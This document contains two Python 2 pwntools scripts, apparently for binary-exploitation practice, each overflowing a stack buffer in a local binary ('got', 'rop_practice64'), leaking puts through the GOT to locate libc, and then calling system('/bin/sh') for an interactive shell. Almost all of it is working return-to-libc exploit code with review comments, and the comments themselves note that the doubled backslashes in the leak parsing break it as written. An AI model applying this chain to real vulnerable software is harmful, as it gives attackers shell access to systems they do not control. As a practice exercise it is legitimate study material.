got


from pwn import *

# Two-stage return-to-libc exercise against the local ./got practice binary
# (Python 2 / pwntools: str payloads, print statement, iterator .next()).
# NOTE(review): the chain relies on fixed code addresses and on the saved
# return address being overwritten unnoticed, so presumably the target is
# non-PIE and built without a stack protector -- confirm with checksec.

# Setup: verbose pwntools logging, a local process, and the ELF metadata
# used to resolve symbol, PLT and GOT addresses.
context.log_level = 'debug'
r = process('./got')
e = ELF('./got')
# libc object that pwntools associates with this ELF; it supplies the symbol
# offsets used below, so it must match the libc the process actually loads.
libc = e.libc

# Gadget address at a fixed offset inside __libc_csu_init.
# NOTE(review): presumably a `pop rdi; ret` sequence, because the word that
# follows it in each chain is consumed as the first argument -- verify against
# a disassembly; the +99 offset is specific to this build.
pr = e.symbols['__libc_csu_init'] + 99
puts_got = e.got['puts']
puts_plt = e.plt['puts']

# Stage 1: leak the run-time address of puts.
r.recvuntil("practice")
# 0x10 + 0x8 = 24 filler bytes placed before the chain.
# NOTE(review): presumably a 0x10-byte buffer plus the saved frame pointer --
# TODO confirm against the target's stack layout.
pay = "A" * 0x10
pay += "A" * 0x8
# Chain: gadget, puts GOT slot, puts PLT stub, then main, so that the resolved
# puts address is printed and the program asks for input a second time.
pay += p64(pr) + p64(puts_got) + p64(puts_plt) + p64(e.symbols['main'])
r.sendline(pay)

# Take the last 6 bytes received up to the delimiter, pad to 8, unpack as a
# little-endian 64-bit value, and subtract puts' offset to get the libc base.
# User-space libc addresses on x86-64 Linux typically have 0x7f as their
# highest non-zero byte, which is why that byte serves as the delimiter.
# NOTE(review): as written, '\\x7f' is the four-character text backslash-x-7-f
# rather than the single byte 0x7f, and "\\x00\\x00" is eight characters rather
# than two NUL bytes. The doubled backslashes look like an escaping artifact of
# how this listing was published -- confirm against the original script.
libc_base = u64(r.recvuntil('\\x7f')[-6:] + "\\x00\\x00") - libc.symbols['puts']
system = libc.symbols['system'] + libc_base
# First occurrence of the string inside libc, rebased to the leaked base.
binsh = libc.search("/bin/sh").next() + libc_base

# Sanity check for the leak: a correct base is expected to be page-aligned.
print hex(libc_base)

# Stage 2: same filler, then the call into libc.
pay = "A" * 0x10
pay += "A" * 0x8
# NOTE(review): 0x4004c9 is presumably a bare `ret` used to keep the stack
# 16-byte aligned before system runs -- TODO confirm. It is hard-coded, unlike
# the symbol-derived addresses above.
pay += p64(0x00000000004004c9) + p64(pr) + p64(binsh) + p64(system)
r.sendline(pay)
# Hand the process's stdin/stdout over to the terminal.
r.interactive()

rop_practice64


from pwn import *

# Two-stage return-to-libc exercise against the local ./rop_practice64
# practice binary (Python 2 / pwntools: str payloads, iterator .next()).
# NOTE(review): both gadget addresses below are hard-coded and the saved
# return address is overwritten unnoticed, so presumably the target is
# non-PIE and built without a stack protector -- confirm with checksec.

# Setup: verbose pwntools logging, a local process, and the ELF metadata
# used to resolve symbol, PLT and GOT addresses.
context.log_level = 'debug'
r = process("./rop_practice64")
e = ELF("./rop_practice64")
# libc object that pwntools associates with this ELF; it supplies the symbol
# offsets used below, so it must match the libc the process actually loads.
libc = e.libc

puts_plt = e.plt['puts']
puts_got = e.got['puts']
# NOTE(review): presumably a `pop rdi; ret` gadget, because the word that
# follows it in each chain is consumed as the first argument -- verify against
# a disassembly; the address is specific to this build.
pr = 0x0000000000400703
# NOTE(review): presumably a bare `ret`, used in stage 2 to keep the stack
# 16-byte aligned before system runs -- TODO confirm.
ret = 0x00000000004004c9

# Stage 1: leak the run-time address of puts.
r.recvuntil("!")
# 0x20 + 8 = 40 filler bytes placed before the chain.
# NOTE(review): presumably a 0x20-byte buffer plus the saved frame pointer --
# TODO confirm against the target's stack layout.
pay = "A" * 0x20
pay += "A" * 8
# Chain: gadget, puts GOT slot, puts PLT stub, then main, so that the resolved
# puts address is printed and the program asks for input a second time.
pay += p64(pr) + p64(puts_got) + p64(puts_plt) + p64(e.symbols['main'])
r.sendline(pay)

# Take the last 6 bytes received up to the delimiter, pad to 8, unpack as a
# little-endian 64-bit value, and subtract puts' offset to get the libc base.
# User-space libc addresses on x86-64 Linux typically have 0x7f as their
# highest non-zero byte, which is why that byte serves as the delimiter.
# NOTE(review): as written, '\\x7f' is the four-character text backslash-x-7-f
# rather than the single byte 0x7f, and "\\x00\\x00" is eight characters rather
# than two NUL bytes. The doubled backslashes look like an escaping artifact of
# how this listing was published -- confirm against the original script.
libc_base = u64(r.recvuntil('\\x7f')[-6:] + "\\x00\\x00") - libc.symbols['puts']
system = libc.symbols['system'] + libc_base
# First occurrence of the string inside libc, rebased to the leaked base.
binsh = libc.search("/bin/sh").next() + libc_base

# Sanity check for the leak: a correct base is expected to be page-aligned.
print (hex(libc_base))

# Stage 2: same filler, then alignment gadget, argument gadget, the string
# address, and system.
pay = "A" * 0x20
pay += "A" * 8
pay += p64(ret) + p64(pr) + p64(binsh) + p64(system)
r.sendline(pay)
# Hand the process's stdin/stdout over to the terminal.
r.interactive()